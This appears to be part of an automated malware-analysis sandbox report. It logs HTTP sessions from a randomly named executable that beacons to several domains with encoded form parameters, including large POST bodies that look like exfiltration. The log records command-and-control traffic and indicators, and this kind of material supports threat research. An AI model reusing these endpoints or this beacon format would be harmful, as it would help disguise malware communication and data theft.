                                                    Data Ascii: efM=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXB6kfjR+zXz2j8NuQaguEeldWlxg8lm4FblyMqoC2ziwhT04sYCwWExXovlQgXFw+NAbEPDmdcIujYwpUY8mRdLd51rnNGalKFBTkqxC4ASgFrCoeNry+khl9A4HwAfMZ/dOBSmSopMglH9MiB/t7rqgm4gOvDgS/wY6JiVr1xxkrNhIR2Hi/PqqtOzi90kRYtxX+twMDIylD1a6xsLozO/d2smMQEfvGRxD6nUQoEIuURpfJvgnItaIH86C6TsIWGCnSAzp6BMD4zzZdl1GAhy1ynK4hNSjgkTZah7uAYjsQiSwZe9xhduYotSMNGmF0fse0ouSPXQ4/Ex7FgagwJ1NQ0CiF7UqGaw43vzH/oOM0Efgz8qT3tWLAL18m7A3P3YwmOXlnaCz8PD/DzHfZAxY7KyKG0NxSP15AFEaDtbbk/YpXSgEp2PTcA4fwQme0Kddi+7lbXKWSP3Nl0evdwfOeTi5BfDArLETMwsyXHEh9LsvbxextPsuFQ8rAqxYi85NFHLu+GPU+AxqXbcrnrTmfV3cXR29nj/QIDqVb/Kcb96WNg80+nZjO26ma948HjsXp0xa96HZ7kMwoqbWFLwye5T18Rr76z7HRla+d7WnKGyxphEMwvfdp32PsVMinSkv7makd9qjRhrpoVd0wElxKDLyR67MAucIoUrzEAp9RmZUnW5J4fFCWQ/pkyuEdIzCx9b3vgneLwlei9JjcIata2rgNcTZo1jg1VYAkfKu+3YvH45gCOuI7Ib5rcKb5SgXRtD4k2uMAAP8nAsh/8P+iSao2XoPCPjllLzf/oo1ZpceVQXw/6PX8fWxgMExvsYIdcdAd42jUYRLrhy7IaowSaW1fJDJr4Ws/qLmqgnIRazSd0mw3QHJ40uKhYECHIOlP0rqaa7Z5KHxFq37wj6T7H7LMBlt/vLQCKYNl/fmOo5e90LRMMgHyHTP6hOdQfcS9a3f [TRUNCATED]
                                                    Aug 5, 2024 15:32:22.070451021 CEST1043INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 810
                                                    content-encoding: br
                                                    vary: Accept-Encoding
                                                    date: Mon, 05 Aug 2024 13:32:21 GMT
                                                    server: LiteSpeed
                                                    Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                    Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.455414109.95.158.127802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:23.941818953 CEST439OUTGET /8unq/?GTP=uhqpjxIPh&efM=RkvL3PdT4df/OPkNHI4HmdhQbyPIEJeZ27MerosBZGKwWjBg2nbmkc0XZ9UwXf1WVngj3AiTKIg7OIM24x6mviVClJubTHF4ksIetQZZ+rgXL6Dldbwq0cw= HTTP/1.1
                                                    Host: www.synergon.space
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:24.597884893 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    x-powered-by: PHP/5.6.40
                                                    content-type: text/html; charset=UTF-8
                                                    content-length: 2247
                                                    date: Mon, 05 Aug 2024 13:32:24 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 70 6c 22 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 41 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 68 6f 73 74 69 6e 67 2e 70 6c 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 43 6f 70 79 72 69 67 68 74 22 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head><meta http-equiv="Content-type" content="text/html;charset=UTF-8" /><meta name="Author" content="dhosting.pl" /><meta name="Copyright" content="dhosting.pl" /><meta name="Language" content="pl" /><meta name="Robots" content="index, follow" /><title>dhosting.pl - pod tym adresem nie znajduje si aden serwis WWW</title><style type="text/css">a:link, a:visited{font: 12px verdana, sans-serif;color:#333;text-decoration:none;}img{border:0px;}a:hover, a:active{color:#000;text-decoration:underline;}#tresc{font: 12px verdana, sans-serif;color: #333;}#foot{font: 10px verdana, sans-serif;color:#606060;text-align:center;position:absolute;bottom:5px;width:99%;}.f:link, .f:visited{font-size:10px;font-weight: bold;font-family: verdana, sans-ser [TRUNCATED]
                                                    Aug 5, 2024 15:32:24.597929001 CEST1200INData Raw: 6e 3a 6e 6f 6e 65 3b 0d 0a 7d 0d 0a 2e 66 3a 68 6f 76 65 72 2c 20 2e 66 3a 61 63 74 69 76 65 7b 0d 0a 63 6f 6c 6f 72 3a 23 32 30 32 30 32 30 3b 0d 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 0d 0a 7d 0d 0a 0d
                                                    Data Ascii: n:none;}.f:hover, .f:active{color:#202020;text-decoration:underline;}</style></head><body><div style="text-align:center;"><a href="https://dhosting.pl" rel="nofollow"><img src="https://dhosting.pl/img/logo.svg" alt="dho


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.4554153.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:29.634285927 CEST712OUTPOST /7ie4/ HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.alanbeanart.com
                                                    Referer: http://www.alanbeanart.com/7ie4/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 6c 34 64 67 64 45 39 43 72 5a 64 30 4b 6f 6a 44 79 79 78 53 67 73 51 48 49 41 4c 6c 4c 5a 79 73 2b 78 6f 47 65 61 6b 4d 35 56 65 2b 75 50 59 64 51 54 67 4b 48 79 41 41 63 6a 71 69 43 4f 52 63 62 61 68 49 77 64 45 7a 30 4e 64 53 76 72 37 4f 36 4e 44 53 43 6f 54 58 6d 39 72 41 70 73 76 34 79 36 75 42 65 61 52 65 32 6a 77 7a 46 6f 78 67 6f 71 57 4a 6e 37 36 78 59 33 38 48 30 58 51 6a 68 5a 66 53 2f 71 6c 4a 42 53 4b 39 46 56 43 31 33 72 65 35 57 38 4b 63 42 54 6a 44 6b 57 44 66 65 5a 62 70 2f 72 73 6d 73 71 45 46 78 50 6f 50 32 4d 53 63 67 3d 3d
                                                    Data Ascii: efM=QWuY90GonuIzDl4dgdE9CrZd0KojDyyxSgsQHIALlLZys+xoGeakM5Ve+uPYdQTgKHyAAcjqiCORcbahIwdEz0NdSvr7O6NDSCoTXm9rApsv4y6uBeaRe2jwzFoxgoqWJn76xY38H0XQjhZfS/qlJBSK9FVC13re5W8KcBTjDkWDfeZbp/rsmsqEFxPoP2MScg==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.4554163.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:32.178124905 CEST732OUTPOST /7ie4/ HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.alanbeanart.com
                                                    Referer: http://www.alanbeanart.com/7ie4/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 39 79 74 63 5a 6f 48 62 75 6b 50 35 56 65 71 2b 4f 51 41 41 54 72 4b 48 2b 2b 41 65 6e 71 69 43 61 52 63 65 6d 68 4a 48 70 4c 7a 6b 4e 62 59 2f 72 35 41 61 4e 44 53 43 6f 54 58 6e 59 4f 41 71 63 76 34 48 79 75 48 2f 61 53 41 6d 6a 7a 30 46 6f 78 6b 6f 71 61 4a 6e 36 70 78 5a 62 61 48 32 76 51 6a 68 4a 66 56 74 53 6d 44 42 53 4d 69 56 55 75 30 46 2f 58 35 7a 64 67 55 79 72 30 4d 31 53 76 65 59 49 42 34 4f 4b 37 30 73 4f 33 59 32 47 63 43 31 78 62 48 74 35 6b 68 78 30 68 45 64 4d 59 32 39 58 59 34 52 74 73 6d 6a 49 3d
                                                    Data Ascii: efM=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY9ytcZoHbukP5Veq+OQAATrKH++AenqiCaRcemhJHpLzkNbY/r5AaNDSCoTXnYOAqcv4HyuH/aSAmjz0FoxkoqaJn6pxZbaH2vQjhJfVtSmDBSMiVUu0F/X5zdgUyr0M1SveYIB4OK70sO3Y2GcC1xbHt5khx0hEdMY29XY4RtsmjI=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.4554173.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:34.709495068 CEST10814OUTPOST /7ie4/ HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.alanbeanart.com
                                                    Referer: http://www.alanbeanart.com/7ie4/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 51 57 75 59 39 30 47 6f 6e 75 49 7a 44 45 49 64 6d 36 77 39 56 37 5a 65 6f 36 6f 6a 4e 53 79 74 53 68 51 51 48 4a 45 68 6c 59 31 79 73 76 68 6f 47 34 32 6b 4f 35 56 65 32 4f 4f 52 41 41 54 79 4b 45 4f 36 41 65 37 36 69 48 65 52 63 37 71 68 63 46 42 4c 34 6b 4e 62 57 76 72 38 4f 36 4e 57 53 44 45 58 58 6d 6f 4f 41 71 63 76 34 41 43 75 48 75 61 53 43 6d 6a 77 7a 46 6f 48 67 6f 72 50 4a 6e 69 35 78 5a 66 73 47 47 50 51 6a 46 56 66 51 59 2b 6d 65 52 53 4f 68 56 55 32 30 46 69 50 35 33 31 47 55 7a 66 53 4d 31 6d 76 64 74 70 61 6f 73 57 76 32 50 66 78 61 46 71 64 4e 43 4e 5a 50 64 31 7a 69 6a 45 41 54 73 51 57 36 50 61 49 2f 77 4e 36 77 32 54 50 2f 43 6f 69 4c 34 6b 32 4a 65 52 30 72 6d 71 6c 69 72 46 46 6e 6a 45 65 74 46 45 63 38 31 73 34 47 6e 64 4b 62 74 6e 41 36 4a 52 77 66 5a 4f 58 49 47 33 36 47 2b 30 69 76 6e 65 75 32 30 2f 38 64 7a 66 66 51 56 77 41 50 46 75 6c 6b 63 6e 65 51 44 51 58 42 70 72 51 33 6d 79 44 6f 59 78 6e 67 4d 62 66 79 51 6b 6d 6c 73 46 57 2b 33 4f 37 6c 4f 46 2b 58 69 [TRUNCATED]
                                                    Data Ascii: efM=QWuY90GonuIzDEIdm6w9V7Zeo6ojNSytShQQHJEhlY1ysvhoG42kO5Ve2OORAATyKEO6Ae76iHeRc7qhcFBL4kNbWvr8O6NWSDEXXmoOAqcv4ACuHuaSCmjwzFoHgorPJni5xZfsGGPQjFVfQY+meRSOhVU20FiP531GUzfSM1mvdtpaosWv2PfxaFqdNCNZPd1zijEATsQW6PaI/wN6w2TP/CoiL4k2JeR0rmqlirFFnjEetFEc81s4GndKbtnA6JRwfZOXIG36G+0ivneu20/8dzffQVwAPFulkcneQDQXBprQ3myDoYxngMbfyQkmlsFW+3O7lOF+Xikpd5Rpx18zf/Hzp/l7r/md0CXui2R4o9igdCYh4GZ+45KJv8CxXM1Qh4jVWAtmczXeVHAGweIKZUJ+CDQ0YjvVgFhWYK4vWkZprScIRAQCinnUBlvyFImbtBbG09zdRTp72U+qnxVKMAA0w/FM9A9gwQ1khvz2lZ3TbXjc9hV/Mx46YkBYCHrLB2wtA8JHvNrNYqTeemKyuQMg+neDN47mRVgeg/fbLL+EsOOEAfAMy3Cigto1RHGf4MiQRxjHXXfjkyZkeBV/XUDDN4SDuSVcZAdlI0TH9OeiqoQlCAKaoYwXccStUCcQh1Ftz07Z2fxnIDf5sTfNC6ach9FKMSqHZCeUgUNAQMmVeSNf5exo9we8ZMT06gtRgPwXGcSgmsqPD4GonID2lcujdg64ObKUGgSkpkg5teRbWjWStdfo1AhlhUge+j9QxSubJMwrADH3zh3xQlhLq6yFor+Z7kz6DN8vAXkvt2trvUhHJDEQQdEtJbZYGu8A/NW2rNj/fk8ncmOTdinA3QtEoDbzgMouoHxAjb2l4q1BvCFUTao969cg7vGoJh1wQnquFcxXBWEqrlWbwPbqWVYbvH0AQOEjsa63HojpofBBHTWg02/ooIAFKovf4XSbpKLCogJHycq1Mue6gfz68PfuaWV866Ns5esEoVOMee8M [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.4554183.33.130.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:37.237335920 CEST440OUTGET /7ie4/?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.alanbeanart.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:32:38.673557043 CEST393INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:38 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 66 4d 3d 64 55 47 34 2b 44 44 64 70 2f 73 6a 44 6c 6f 58 78 73 31 31 62 4b 64 6a 70 66 45 39 4b 54 4b 32 58 69 4d 69 4f 5a 6b 44 34 34 46 53 6a 4c 31 42 55 4a 43 30 42 37 5a 62 39 70 43 6d 65 43 66 56 58 6b 6d 41 46 76 50 50 6f 67 47 52 52 6f 69 76 4b 56 68 4c 7a 32 34 36 53 2b 44 52 4c 70 78 53 62 6d 6f 69 54 43 46 30 4f 4a 67 45 34 54 33 2f 4a 76 2b 31 63 32 6b 3d 26 47 54 50 3d 75 68 71 70 6a 78 49 50 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?efM=dUG4+DDdp/sjDloXxs11bKdjpfE9KTK2XiMiOZkD44FSjL1BUJC0B7Zb9pCmeCfVXkmAFvPPogGRRoivKVhLz246S+DRLpxSbmoiTCF0OJgE4T3/Jv+1c2k=&GTP=uhqpjxIPh"}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.45541964.226.69.42802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:43.708153963 CEST700OUTPOST /rdfm/ HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.kacotae.com
                                                    Referer: http://www.kacotae.com/rdfm/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 31 44 62 42 62 42 4e 31 47 4e 44 72 62 35 59 55 6f 7a 31 38 56 56 67 42 4d 64 70 45 2b 5a 65 67 42 49 46 4a 4b 4a 47 64 58 46 65 6b 42 6f 6a 30 51 79 33 74 36 47 33 62 32 4c 48 52 6f 43 71 72 2f 47 36 52 6b 6d 63 73 52 30 5a 4a 4d 73 66 36 37 48 52 57 30 75 51 32 55 61 54 79 67 77 32 49 37 54 39 4f 6a 35 33 4d 76 4e 55 76 45 64 69 7a 63 4f 2f 56 6a 58 68 67 36 43 2f 2b 41 74 67 57 30 42 31 58 5a 63 4f 6a 75 61 5a 56 35 31 38 63 52 74 58 68 71 54 77 33 6d 4b 70 69 5a 70 56 55 6e 45 6e 44 6c 2b 30 76 63 59 6f 7a 30 72 4e 76 52 59 38 56 43 77 3d 3d
                                                    Data Ascii: efM=9pMmvcz73uDu1DbBbBN1GNDrb5YUoz18VVgBMdpE+ZegBIFJKJGdXFekBoj0Qy3t6G3b2LHRoCqr/G6RkmcsR0ZJMsf67HRW0uQ2UaTygw2I7T9Oj53MvNUvEdizcO/VjXhg6C/+AtgW0B1XZcOjuaZV518cRtXhqTw3mKpiZpVUnEnDl+0vcYoz0rNvRY8VCw==
                                                    Aug 5, 2024 15:32:44.347558975 CEST361INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:44 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.45542064.226.69.42802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:46.237900972 CEST720OUTPOST /rdfm/ HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.kacotae.com
                                                    Referer: http://www.kacotae.com/rdfm/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 39 70 4d 6d 76 63 7a 37 33 75 44 75 30 6a 72 42 64 57 68 31 52 39 44 6b 46 70 59 55 78 44 30 33 56 56 6b 42 4d 66 46 75 2f 71 32 67 43 70 31 4a 4c 49 47 64 57 46 65 6b 50 49 6a 37 4e 69 33 6b 36 47 37 6c 32 4b 37 52 6f 43 2b 72 2f 45 79 52 6b 52 49 72 58 6b 5a 48 55 63 66 34 31 6e 52 57 30 75 51 32 55 61 57 5a 67 77 65 49 34 6a 74 4f 68 59 33 54 6a 74 55 73 44 64 69 7a 4e 65 2f 4a 6a 58 68 57 36 44 69 70 41 76 6f 57 30 42 6c 58 59 4a 69 73 6b 61 5a 54 30 56 39 54 62 4f 2b 4e 7a 7a 45 2f 6c 61 39 53 63 39 56 54 69 43 32 5a 30 50 56 34 4f 59 4d 41 70 73 45 62 63 62 42 63 5a 31 33 4b 59 7a 70 74 4c 2f 55 37 42 69 5a 6f 76 59 70 34 46 77 49 3d
                                                    Data Ascii: efM=9pMmvcz73uDu0jrBdWh1R9DkFpYUxD03VVkBMfFu/q2gCp1JLIGdWFekPIj7Ni3k6G7l2K7RoC+r/EyRkRIrXkZHUcf41nRW0uQ2UaWZgweI4jtOhY3TjtUsDdizNe/JjXhW6DipAvoW0BlXYJiskaZT0V9TbO+NzzE/la9Sc9VTiC2Z0PV4OYMApsEbcbBcZ13KYzptL/U7BiZovYp4FwI=
                                                    Aug 5, 2024 15:32:46.883445024 CEST361INHTTP/1.1 404 Not Found
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:32:46 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Content-Encoding: gzip
                                                    Data Raw: 61 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0a 02 31 10 44 7b c1 7f 58 3f 20 44 e1 ca 90 46 14 2c b4 f1 0b 72 ee 7a 09 e4 b2 c7 5e 2c ee ef 4d f4 0e c4 da d2 72 67 de 0c c3 1a 9f fb 68 d7 2b e3 c9 a1 35 39 e4 48 b6 d9 36 70 e1 0c 47 7e 24 34 fa 2d 1a fd 42 0a da 32 4e 35 72 a3 94 49 ac f1 bb ef 44 51 8c 9e ed da 5d a0 f9 e2 81 92 d0 98 a7 4f 5f 2f 8d 7a 59 b3 51 0a 1c 0c 0e 31 a4 0e 32 03 86 d1 b5 91 e0 7c 3d 1d c0 25 84 bd 17 ee 09 ee 12 28 61 9c 80 44 58 4a a2 23 50 aa ae fb 57 fc f2 17 4f 11 d4 0d c8 28 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: ac1D{X? DF,rz^,Mrgh+59H6pG~$4-B2N5rIDQ]O_/zYQ12|=%(aDXJ#PWO(0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.45542164.226.69.42802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:32:48.770221949 CEST10802OUTPOST /rdfm/ HTTP/1.1
                                                    Host: www.kacotae.com
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.kacotae.com
                                                    Referer: http://www.kacotae.com/rdfm/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
